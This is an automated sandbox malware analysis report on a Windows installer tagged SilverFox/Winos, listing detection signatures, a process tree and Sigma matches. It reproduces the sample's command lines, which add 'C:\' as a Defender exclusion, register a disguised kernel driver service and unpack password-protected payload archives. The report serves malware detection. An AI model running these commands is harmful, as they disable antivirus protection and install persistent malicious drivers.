Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U5b89#U88c5#U52a9#U624b2.0.5.exe

Overview

General Information

Sample name:#U5b89#U88c5#U52a9#U624b2.0.5.exe
renamed because original name is a hash value
Original sample name:2.0.5.exe
Analysis ID:1580393
MD5:87a72f4be35eff0b33e71d38146067b6
SHA1:18444d42be38abaaa8e41a643f3db7f89338accb
SHA256:be5caf69b35ebefb40069de05b80b28f4d89d532dd3661b39e0762556c89585d
Tags:exeSilverFoxwinosuser-kafan_shengui
Infos:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • SgrmBroker.exe (PID: 2000 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 2760 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6140 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6640 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • #U5b89#U88c5#U52a9#U624b2.0.5.exe (PID: 7176 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe" MD5: 87A72F4BE35EFF0B33E71D38146067B6)
    • #U5b89#U88c5#U52a9#U624b2.0.5.tmp (PID: 7276 cmdline: "C:\Users\user~1\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp" /SL5="$2042A,6110134,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe" MD5: 4E9D08C44F409F54940837360055C5AF)
      • powershell.exe (PID: 7292 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 7644 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b2.0.5.exe (PID: 7576 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe" /VERYSILENT MD5: 87A72F4BE35EFF0B33E71D38146067B6)
        • #U5b89#U88c5#U52a9#U624b2.0.5.tmp (PID: 7628 cmdline: "C:\Users\user~1\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp" /SL5="$10448,6110134,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe" /VERYSILENT MD5: 4E9D08C44F409F54940837360055C5AF)
          • 7zr.exe (PID: 7800 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 7912 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7460 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cmd.exe (PID: 7752 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7768 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8016 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8032 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8048 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8072 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8136 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8148 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1312 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3540 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3452 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7376 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7232 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1652 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4064 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7512 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2056 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1168 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1568 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1588 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1840 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1888 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1928 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1532 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7216 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7708 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2992 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3084 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7760 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7796 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6012 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5976 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6968 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7868 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6696 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7332 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 6844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7456 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7516 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6204 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4376 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7984 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7968 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8028 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8044 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8080 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8156 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8112 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8072 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5144 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3452 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7304 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1240 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7412 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp" /SL5="$2042A,6110134,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp, ParentProcessId: 7276, ParentProcessName: #U5b89#U88c5#U52a9#U624b2.0.5.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7292, ProcessName: powershell.exe
Sigma detected: New Kernel Driver Via SC.EXE
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7752, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 7768, ProcessName: sc.exe
Sigma detected: Powershell Defender Exclusion
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp" /SL5="$2042A,6110134,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp, ParentProcessId: 7276, ParentProcessName: #U5b89#U88c5#U52a9#U624b2.0.5.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7292, ProcessName: powershell.exe
Sigma detected: Use Short Name Path in Command Line
Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp" /SL5="$2042A,6110134,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp" /SL5="$2042A,6110134,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp, NewProcessName: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp, OriginalFileName: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp, ParentCommandLine: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe", ParentImage: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe, ParentProcessId: 7176, ParentProcessName: #U5b89#U88c5#U52a9#U624b2.0.5.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp" /SL5="$2042A,6110134,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe" , ProcessId: 7276, ProcessName: #U5b89#U88c5#U52a9#U624b2.0.5.tmp
Sigma detected: New Service Creation Using Sc.EXE
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7752, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 7768, ProcessName: sc.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp" /SL5="$2042A,6110134,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp, ParentProcessId: 7276, ParentProcessName: #U5b89#U88c5#U52a9#U624b2.0.5.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7292, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc, CommandLine: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc, ProcessId: 2760, ProcessName: svchost.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\Windows NT\hrsw.vbcReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\is-3SJ46.tmp\update.vacReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\is-GHUQ4.tmp\update.vacReversingLabs: Detection: 23%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.9% probability
Source: #U5b89#U88c5#U52a9#U624b2.0.5.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b2.0.5.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 00000013.00000003.1430369809.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 00000013.00000003.1430551725.00000000037B0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C90B430 FindFirstFileA,FindClose,11_2_6C90B430
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A76868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,17_2_00A76868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A77496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,17_2_00A77496
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: time.windows.com
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 00000006.00000003.1376560783.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.11.dr, update.vac.11.dr, update.vac.6.dr, hrsw.vbc.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 00000006.00000003.1376560783.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.11.dr, update.vac.11.dr, update.vac.6.dr, hrsw.vbc.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 00000006.00000003.1376560783.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.11.dr, update.vac.11.dr, update.vac.6.dr, hrsw.vbc.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 00000006.00000003.1376560783.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.11.dr, update.vac.11.dr, update.vac.6.dr, hrsw.vbc.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 00000006.00000003.1376560783.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.11.dr, update.vac.11.dr, update.vac.6.dr, hrsw.vbc.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 00000006.00000003.1376560783.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.11.dr, update.vac.11.dr, update.vac.6.dr, hrsw.vbc.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 00000006.00000003.1376560783.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.11.dr, update.vac.11.dr, update.vac.6.dr, hrsw.vbc.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
